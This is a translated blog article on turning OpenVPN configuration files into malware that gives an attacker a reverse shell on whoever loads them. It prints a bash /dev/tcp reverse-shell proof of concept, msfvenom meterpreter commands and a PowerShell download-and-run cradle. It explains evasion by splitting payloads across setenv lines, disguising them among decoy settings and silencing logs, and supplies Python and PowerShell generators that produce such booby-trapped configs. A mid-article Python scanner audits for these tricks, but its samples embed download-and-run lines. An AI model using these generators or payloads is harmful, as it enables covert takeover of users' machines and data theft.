
How to analyze the Security Exploration of counteracting with OpenVpn configuration File

2025-04-06 Update From: SLTechnology News&Howtos (Network Security)


Shulou(Shulou.com)05/31 Report--

This article explains in detail how OpenVPN configuration files can be abused to obtain a reverse shell on the machine that loads them ("counter-exploitation" of the VPN user). The content is of good quality, so the editor shares it as a reference; I hope you will have some understanding of the relevant knowledge after reading it.

OpenVPN is a common enterprise data transport tool, but loading an untrusted .ovpn file is very dangerous: once it has been maliciously crafted it can lead to the disclosure of enterprise data. The following shows how an attacker modifies an OpenVPN configuration file into a "counter-exploitation" module that calls back to a remote control server, giving the attacker control of the OpenVPN user's system, and discusses this behaviour in depth.

Brief introduction

The original post describes how to get a reverse shell from an OVPN file (an OpenVPN configuration file). The core is the documented `up` directive, normally used to run a script that sets routes after the TUN device comes up. In essence it lets the configuration point the OpenVPN process at an arbitrary script and run it (as long as `script-security` is 2 or higher).

The original post gives this Linux PoC:

remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up "/bin/bash -c '/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1'"

It also explores the feasibility of getting a shell on Windows through PowerShell.

The limit that an `up` command parameter must be shorter than 256 characters is bypassed by splitting the payload across environment variables (`setenv`).

A configuration file carrying such an obviously malicious command is hard to use against security-aware targets.

Optimization

Test environment: Ubuntu 20 (with OpenVPN) + Windows 10 (OpenVPN GUI 2.4.9, https://openvpn-gui.en.lo4d.com/windows)

01 Linux

First the Linux platform, where the test can load the configuration directly with the system's own openvpn:

openvpn --config evil.config

Since the payload can be split across environment variables on Windows, obviously the same can be done on Linux.

Imitating common botnet practice, a command that downloads the Trojan and executes it is base64-encoded.

But there is no way to remove the `/bin/bash` signature. I went through the official sample configuration file, added more than 100 lines of configuration directives and comments to it, and obfuscated the names of the variables holding the split payload, disguising them as certificate-related settings.

# generate
msfvenom -p linux/x86/meterpreter_reverse_https LHOST=192.168.114.165 LPORT=8080 -o a -f elf
# host the launcher
python3 -m http.server 80
# start to listen
msfconsole -r linux_listen.rc

Msf gets the session normally. (The screenshot is not available.)

02 Win

I originally thought Windows would be easier, since the original post already gives a PowerShell PoC, but... First look at the call in the original post:

up 'C:\\Windows\\System32\\cmd.exe /c (start %z1% -WindowStyle Hidden -EncodedCommand %A1%%B1%%C1% ... %S1%)'

(The exact sequence of the roughly twenty variable names did not survive extraction.)

It used a PowerShell script from the Sanwu workshop, and the command needed more than 20 variables to split it; here msf is used instead.

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=6666 -f psh-reflection -o a.ps1
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=6666 -f psh -o a.ps1
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=6666 -f psh-net -o a.ps1

I tried all three formats, and none is very stable: only the initial stager connects and the meterpreter stage falls over.

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.114.165 lport=8888 -f base64

Finally, the raw payload is substituted into the PowerShell template from Cobalt Strike, with the template's XOR decoding taken into account.

# host the launcher
python3 -m http.server 80
# start to listen
msfconsole -r win_listen.rc

When loading, only this one string needs to be executed:

iex (New-Object Net.WebClient).DownloadString('http://127.0.0.1/a.ps1');a.ps1

This shortens the command to four segments and simplifies the parameters; the `-` parameter prefix is replaced with `/` for basic evasion, otherwise the file is too obvious to look at.

setenv K0 xxx
setenv K1 xxx
setenv K2 xxx
setenv K3 xxx
up 'C:\\Windows\\System32\\cmd.exe /c "(start powershell /w hidden /enc %K0%%K1%%K2%%K3%)"'

The first attempt executes successfully, but the hidden switch has no effect and a PowerShell window flashes by.

Passing the hidden switch to powershell launched through `cmd /c` from a cmd terminal, or even from a webshell, should not produce any flashing window.

Then I realised that `start` launches a new process; it looks like the following command but behaves differently. It really is a matter of how it is invoked.

cmd.exe /c powershell /w hidden /enc %K0%%K1%%K2%%K3%

Try dropping `start`. How does that go? No, it breaks, although the official documentation states that parameters may be quoted with single or double quotes and that backslash is the escape character.

In some cases, specifically the GUI on Windows, parsing fails because the whole PowerShell command string is not taken as a single parameter.

And launching through `start` brings the flashing window. After some searching, it turns out `start` has a `/b` switch that gets rid of this annoying flash.

Checking the error log in detail: after this series of commands runs, the return value is not what openvpn expects, so openvpn treats it as an execution failure, kills the process and aborts everything.

So a pipe is added to swallow the output:

up 'C:\\Windows\\System32\\cmd.exe /c "(start /min /b powershell /w hidden /enc encoded_shellcode) | cmd"'

But this is still too long. Since cmd is invoked and then calls powershell, there are actually two chances to expand environment variables, so another layer of variables can be nested:

setenv kk 'start /min /b powershell /w hidden /enc %k0%%k1%%k2%%k3%'
up 'C:\\Windows\\System32\\cmd.exe /c "(%kk%) | cmd"'

Of course, don't forget to set the log level, otherwise debug output writes the command to the log.

# Set log file verbosity.
verb 0

Final exploitation

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.114.165 lport=8888 -f base64
# substitute the shellcode into the powershell template, then host it
python3 -m http.server 80
# base64-encode the download one-liner, cut it into four segments, and hide them in the configuration file
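As an added example that is not part of the original article or its generator scripts: a small Python audit that does the defender's side of what the Linux base64 split above and the Windows `setenv` chain (`%kk%` expanding to `%K0%%K1%%K2%%K3%`) rely on. It parses an .ovpn file, collects `setenv` values, expands `%VAR%` and `$VAR` references inside `up`-style directives the way cmd.exe or bash would (including the nested layer), decodes any base64 blob it then finds (UTF-16LE for `/enc`, UTF-8 for the Linux one-liner) and reports the indicators, and it also flags `script-security 2` and `verb 0`. The two embedded configs are constructed samples in the shape of this article's final configs (192.0.2.10 is a documentation address; the decoy lines are omitted). The quoting rules only approximate OpenVPN's parser and the indicator list is illustrative, both assumptions of this example.

```python
import base64
import re
import shlex

# Directives that make OpenVPN run an external command; all need script-security >= 2.
EXEC_DIRECTIVES = {"up", "down", "route-up", "route-pre-down", "ipchange", "tls-verify",
                   "auth-user-pass-verify", "client-connect", "client-disconnect"}
RISKY_SETTINGS = {("script-security", "2"), ("script-security", "3"), ("verb", "0")}
# Substrings worth flagging once the command line is fully expanded and base64-decoded.
INDICATORS = ["/bin/bash", "/bin/sh", "/dev/tcp/", "base64 -d", "curl ", "wget ", "chmod +x",
              "cmd.exe", "powershell", "/enc", "-encodedcommand", "iex", "downloadstring"]
ENV_REF = re.compile(r"%([A-Za-z_]\w*)%|\$\{?([A-Za-z_]\w*)\}?")   # %VAR%, $VAR, ${VAR}
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

def parse_ovpn(text):
    """(directive, args) list plus setenv map; quoting approximates OpenVPN (quotes, backslash, # ; comments)."""
    directives, env = [], {}
    for line in text.splitlines():
        lex = shlex.shlex(line, posix=True)
        lex.whitespace_split, lex.commenters = True, "#;"
        try:
            parts = list(lex)
        except ValueError:                 # unbalanced quote: fall back to raw words
            parts = line.split()
        if not parts:
            continue
        if parts[0] == "setenv" and len(parts) >= 3:
            env[parts[1]] = " ".join(parts[2:])
        directives.append((parts[0], parts[1:]))
    return directives, env

def expand(cmd, env, rounds=8):
    """Resolve %VAR% (cmd.exe, case-insensitive) and $VAR (sh); repeat so nested setenv indirection unfolds."""
    lower = {k.lower(): v for k, v in env.items()}
    def lookup(m):
        if m.group(1) is not None:
            return lower.get(m.group(1).lower(), m.group(0))
        return env.get(m.group(2), m.group(0))
    for _ in range(rounds):
        new = ENV_REF.sub(lookup, cmd)
        if new == cmd:
            break
        cmd = new
    return cmd

def decode_blob(blob):
    """Base64 -> text: UTF-16LE (powershell -EncodedCommand) if all high bytes are zero, else UTF-8; None if not text."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return None
    enc = "utf-16-le" if raw and len(raw) % 2 == 0 and not any(raw[1::2]) else "utf-8"
    try:
        text = raw.decode(enc)
    except UnicodeDecodeError:
        return None
    return text if text and all(c.isprintable() or c in "\r\n\t" for c in text) else None

def audit(text):
    """One finding per risky directive, with the command as the shell would finally see it."""
    findings, (directives, env) = [], parse_ovpn(text)
    for name, args in directives:
        if args and (name, args[0]) in RISKY_SETTINGS:
            findings.append(dict(directive=name, command=" ".join(args),
                                 indicators=["risky setting"], decoded=[]))
        elif name in EXEC_DIRECTIVES:
            cmd = expand(" ".join(args), env)
            decoded = [d for d in map(decode_blob, B64_BLOB.findall(cmd)) if d]
            hay = (cmd + " " + " ".join(decoded)).lower()
            findings.append(dict(directive=name, command=cmd, decoded=decoded,
                                 indicators=[i for i in INDICATORS if i in hay]))
    return findings

def split4(s):
    n = len(s) // 4
    return s[:n], s[n:2 * n], s[2 * n:3 * n], s[3 * n:]

# Constructed samples (not from the article) in the shape of its final configs;
# 192.0.2.10 is a documentation address and the decoy lines are left out.
_PS = "iex (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"
WIN_SAMPLE = r"""script-security 2
verb 0
setenv K0 {0}
setenv K1 {1}
setenv K2 {2}
setenv K3 {3}
setenv kk 'start /min /b powershell /w hidden /enc %K0%%K1%%K2%%K3%'
up 'C:\\Windows\\System32\\cmd.exe /c "(%kk%) | cmd"'
""".format(*split4(base64.b64encode(_PS.encode("utf-16-le")).decode()))
_SH = "curl http://192.0.2.10/a -s -o /tmp/wxyz && chmod +x /tmp/wxyz && /tmp/wxyz"
LINUX_SAMPLE = """script-security 2
setenv resolv {0}
setenv key {1}
setenv client_key {2}
setenv cert {3}
up "/bin/bash -c 'echo $resolv$key$client_key$cert | base64 -d | /bin/bash'"
""".format(*split4(base64.b64encode(_SH.encode()).decode()))
```

`audit(WIN_SAMPLE)` returns three findings (`script-security`, `verb`, `up`); the `up` finding carries the fully expanded command and the decoded `iex ... DownloadString(...)` line, which never appears on any single line of the file. That is the point of expanding first: a scanner that greps each line for `powershell` or `/bin/bash` misses the split and nested form. A `%VAR%` that no `setenv` defines is left unexpanded, since it would refer to the victim's real environment.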

All of this by hand? What a hassle. Can that even be called weaponization?

Weaponization

Generate it with a script. Here it comes.

01 Linux

Linux platform configuration file generation script:

import argparse
import base64
import random

# The full .ovpn template (more than 100 lines of decoy directives and comments) was left out
# of the article as too long; {first}..{fourth} mark where the four setenv lines are inserted.
template = '''...'''


def handle_tempalte(p1, p2, p3, p4):
    # Hide the four payload fragments behind certificate-looking variable names.
    return template.format(
        first='setenv resolv "{}"'.format(p1),
        second='setenv key "{}"'.format(p2),
        thrid='setenv client_key "{}"'.format(p3),
        fourth='setenv cert "{}"'.format(p4))


def encode_payload(url):
    # Random 4-letter file name, then base64 of a download-and-run one-liner.
    file_str = ''.join(random.sample('zyxwvutsrqponmlkjihgfedcba', 4))
    cmd = "curl {url} -s -o /tmp/{f} && chmod +x /tmp/{f} && /tmp/{f}".format(url=url, f=file_str)
    return base64.b64encode(cmd.encode("utf-8")).decode("ascii")


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("url", help="the url where to download your cat")
    args = parser.parse_args()
    evil_code = encode_payload(args.url)
    print("[+] evil_code: {}".format(evil_code))
    # Cut the base64 into four parts; the last part takes the remainder.
    flag = len(evil_code) // 4
    file_content = handle_tempalte(evil_code[:flag], evil_code[flag:2 * flag],
                                   evil_code[2 * flag:3 * flag], evil_code[3 * flag:])
    with open("evil.config", "w") as f:
        f.write(file_content)
    print('[*] Done! Maybe you should: msfvenom -p linux/x86/meterpreter_reverse_https '
          'LHOST=192.168.114.165 LPORT=8080 -o a -f elf')

02 Win

The base64 that the `/enc` parameter of PowerShell expects is of the UTF-16LE (Unicode) bytes, not UTF-8... so I had no choice but to write this one in PowerShell.

Set-StrictMode -Version 2

# Both here-strings were left out of the article as too long: $powershell_template is the
# launcher .ps1 with a %DATA% placeholder, $tempalte is the decoy .ovpn with {first}..{fourth}.
$powershell_template = @'
...
'@
$tempalte = @'
...
'@

function handle_tempalte {
    Param($first, $second, $thrid, $fourth)
    $t = $tempalte.Replace('{first}', $first)
    $t = $t.Replace('{second}', $second)
    $t = $t.Replace('{thrid}', $thrid)
    return $t.Replace('{fourth}', $fourth)
}

function handle_pstempalte {
    Param($shellcode)
    return $powershell_template.Replace('%DATA%', $shellcode)
}

$url = Read-Host "Please enter your download url, Ex: http://192.168.114.165/a.ps1:"
$file = Read-Host "Please enter your script name, Ex: a.ps1:"
$raw_payload = "iex (New-Object Net.WebClient).DownloadString('{url}');{file}".Replace('{url}', $url).Replace('{file}', $file)
Write-Host $raw_payload
# /enc (-EncodedCommand) takes base64 of the UTF-16LE bytes, hence Encoding.Unicode
$b64_payload = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($raw_payload))
# split payload into four setenv lines; the last one takes the remainder
$flag = [int][Math]::Floor($b64_payload.Length / 4)
$evil_ovpn = handle_tempalte $b64_payload.Substring(0, $flag).Insert(0, "setenv K0 ") `
                             $b64_payload.Substring($flag, $flag).Insert(0, "setenv K1 ") `
                             $b64_payload.Substring($flag * 2, $flag).Insert(0, "setenv K2 ") `
                             $b64_payload.Substring($flag * 3).Insert(0, "setenv K3 ")
Out-File -FilePath .\evil.ovpn -InputObject $evil_ovpn -Encoding utf8
Write-Host "generate shellcode command: msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.114.165 lport=8888 -f base64"
$shellcode = Read-Host "Please enter your shellcode:"
$evil_ps = handle_pstempalte $shellcode
Out-File -FilePath .\evil.ps1 -InputObject $evil_ps -Encoding utf8

Usage

01 Linux

msfvenom -p linux/x86/meterpreter_reverse_https LHOST=192.168.114.165 LPORT=8080 -o a -f elf
python3 generate_linux.py http://192.168.114.165/a
# host the launcher
python3 -m http.server 80
# start to listen
msfconsole -r linux_listen.rc
# the target loads the evil config file
sudo openvpn --config evil.config

02 Win

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.114.165 lport=8888 -f base64
powershell -ep bypass -f generate_win.ps1
> Please enter your download url, Ex: http://192.168.114.165/a.ps1:: http://192.168.114.165/a.ps1
> Please enter your script name, Ex: a.ps1:: a.ps1
> iex (New-Object Net.WebClient).DownloadString('http://192.168.114.165/a.ps1');a.ps1
> generate shellcode command: msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.114.165 lport=8888 -f base64
> Please enter your shellcode:: shellcode
> [*] Done! Host your evil.ps1 by 'python3 -m http.server 80' on your vps
> [+] please look at evil.ovpn, and show me your SET skill
# host the launcher
python3 -m http.server 80
# start to listen
msfconsole -r win_listen.rc

This concludes the analysis of how OpenVPN configuration files can be abused to turn the tables on the user who loads them. I hope the above is of some help and that you can learn more from it; if you think the article is good, share it for more people to see.
